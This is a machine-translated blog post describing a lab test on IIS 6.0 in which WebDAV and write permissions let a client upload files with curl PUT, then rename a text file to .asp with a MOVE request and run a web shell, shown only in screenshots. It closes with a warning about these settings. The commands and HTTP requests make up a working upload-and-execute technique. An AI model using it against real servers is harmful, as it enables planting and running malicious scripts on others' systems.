Test environment:A virtual machine that has been installed with windows server 2003 and has activated IIS and an XP client. Note: Only IIS components are installed on the server. No site is configured currently. Default NTFS security settings are used for all partitions.
| Server |
Client |
| Name: WWW1 |
Name: Test1 |
| OS: Windows Server 2003 |
OS: Windows XP Pro |
| Software: IIS 6.0 + dotnet 2.0 with sp2 |
Software: Curl for windows (c: \ curl) Iiswritec: \ iiswrite) |
| IP: 192.168.1.11 |
IP: 192.168.1.101 |
Steps:1. The ghost file is used as the test page and the content is hello. 2. Open the WWW1 IIS management tool, right-click the default site, delete it, and then delete the default application pool. Create an application pool test, create a new website test.com, set the path to d: \ webdata \ test, and use the default settings for others. Set the application pool test.com to test, use a pure script. 3. Change the hosts file on client Test1, add a line "192.168.1.11 test.com", and enter http://test.com You can see the home page of www1. 4. On the client Test1, open the command prompt, enter the curl directory, and test uploading a file d: \ test.txt ). Note: The "write" permission C: \ curl> curl-T d: \ test.txt is not enabled on the server. http://test.com /-V-T = transfer,-v = view) * About to connect () to test.com port 80 (#0) * Trying 192.168.1.11... connected * Connected to test.com (192.168.1.11) port 80 (#0)> PUT/test % 2 Etxt HTTP/1.1> User-Agent: curl/7.19.4 (i586-pc-mingw32msvc) libcurl/7.19.4 OpenSSL/0.9.8g zlib/1.2.3> Host: test.com> Accept: */*> Content-Length: 48> keep CT: 100-continue> <HTTP/1.1 501 Not Implemented indicates that the file cannot be put) <Content-Length: 0 <Server: Microsoft-IIS/6.0 <X-Powered-By: ASP. NET <Date: Tue, 21 Dec 2010 03:46:32 GMT <* Connection #0 to host test.com left intact * Closing connection #0 5. open the write permission on WWW1. 6. Repeat the last curl File Upload Command on test1. Note: The Write Permission C: \ curl> curl-T d: \ test.txt has been enabled. http://test.com /-V * About to connect () to test.com port 80 (#0) * Trying 192.168.1.11... connected * Connected to test.com (192.168.1.11) port 80 (#0)> PUT/test % 2 Etxt HTTP/1.1> User-Agent: curl/7.19.4 (i586-pc-mingw32msvc) libcurl/7.19.4 OpenSSL/0.9.8g zlib/1.2.3> Host: test.com> Accept: */*> Content-Length: 48> keep CT: 100-continue> <HTTP/1.1 501 Not Implemented still cannot put the file, why? <Content-Length: 0 <Server: Microsoft-IIS/6.0 <X-Powered-By: ASP. NET <Date: Tue, 21 Dec 2010 03:53:00 GMT <* Connection #0 to host test.com left intact * Closing connection #0 7. in the web Extension Service on WWW1, set webdav to "allowed ". 8. Return to TEST1 and repeat the curl File Upload Command. Note: The "write" permission is enabled and webdav is enabled at the same time. C: \ curl> curl-T d: \ test.txt http://test.com /-V * About to connect () to test.com port 80 (#0) * Trying 192.168.1.11... connected * Connected to test.com (192.168.1.11) port 80 (#0)> PUT/test % 2 Etxt HTTP/1.1> User-Agent: curl/7.19.4 (i586-pc-mingw32msvc) libcurl/7.19.4 OpenSSL/0.9.8g zlib/1.2.3> Host: test.com> Accept: */*> Content-Length: 48> keep CT: 100-continue> <HTTP/1.1 100 Continue <HTTP/1.1 201 Created indicates that the file has been put successfully) <Date: Tue, 21 Dec 2010 03:56:52 GMT <Server: microsoft-IIS/6.0 <X-Powered-By: ASP. NET <Location: http://test.com /Test.txt you can also view the uploaded file through this URL) <Content-Length: 0 <Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK <* Connection #0 to host test.com left intact * Closing connection #0 9. then, test and upload the exe file or Trojan program on test1 ). C: \ curl> curl-T d: \ test.exe http://test.com /-V * About to connect () to test.com port 80 (#0) * Trying 192.168.1.11... connected * Connected to test.com (192.168.1.11) port 80 (#0)> PUT/test % 2 Eexe HTTP/1.1> User-Agent: curl/7.19.4 (i586-pc-mingw32msvc) libcurl/7.19.4 OpenSSL/0.9.8g zlib/1.2.3> Host: test.com> Accept: */*> Content-Length: 0> keep CT: 100-continue> <HTTP/1.1 201 Created exe, all executable files such as vbs are available, except asp) <Date: Tue, 21 Dec 2010 04:01:51 GMT <Server: Microsoft-IIS/6.0 <X-Powered-By: ASP. NET <Location: http://test.com /Test.exe <Content-Length: 0 <Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK <* Connection #0 to host test.com left intact * Closing connection #0 has already played a role in this step. However, it would be very dangerous to hook up the "accidentally" link to "script resource access. 10. Enable "script Resource Access" on WWW1 ". Note: after this option is checked, script programs such as asp can be executed. But it does not mean that asp files can be uploaded directly. 11. Because asp files cannot be uploaded directly, only one txt file can be put first, and then the txt file can be changed to asp files by moving. Create a new text file test.txt on the test1machine, paste the prepared code into it, and open the c: \ iiswrite.exe program. This program contains many HTTP/1.1 operations ). I select the putoperation, select the test.txt file, and then click "submit data packet ".
650) this. width = 650; "border =" 0 "alt =" "src =" http://www.bkjia.com/uploads/allimg/131227/0UZ33625-0.jpg "/>
In the above output, we can see that put succeeded 201 created ). Next, move the file suffix. The following is the move statement. Some values are red notes that can be changed in the black window.) MOVE/test.txt HTTP/1.1 (put file name) Host: test.com Destination Domain Name) Destination: http://test.com/test.asp modified file name)
650) this. width = 650; "border =" 0 "alt =" "src =" http://www.bkjia.com/uploads/allimg/131227/0UZ36039-1.jpg "/>
201 created) -- expected results. 13. Open the asp file with ie on the TEST1 client, and enjoy the effect of the malicious code in the image below http://test.com/test.asp.
650) this. width = 650; "border =" 0 "alt =" "src =" http://www.bkjia.com/uploads/allimg/131227/0UZ335G-2.jpg "/>
650) this. width = 650; "border =" 0 "alt =" "src =" http://www.bkjia.com/uploads/allimg/131227/0UZ34202-3.jpg "/>
View System User List
650) this. width = 650; "border =" 0 "alt =" "src =" http://www.bkjia.com/uploads/allimg/131227/0UZ3NP-4.jpg "/>
Trojan
650) this. width = 650; "border =" 0 "alt =" "src =" http://www.bkjia.com/uploads/allimg/131227/0UZ3JP-5.jpg "/>
Conclusion: enabling the webdav and "write" permissions can cause serious security risks to websites and servers. These problems can be avoided manually. If you accidentally hook up "Access to script resources" to allow illegal users to put and execute asp script files, the consequences would be unimaginable. At the request of Boyou, the following is the full PDF document for you to download. Http://down.51cto.com/data/154237
This article is from the "Leaves Station" blog, please be sure to keep this source http://yangye.blog.51cto.com/922715/461590
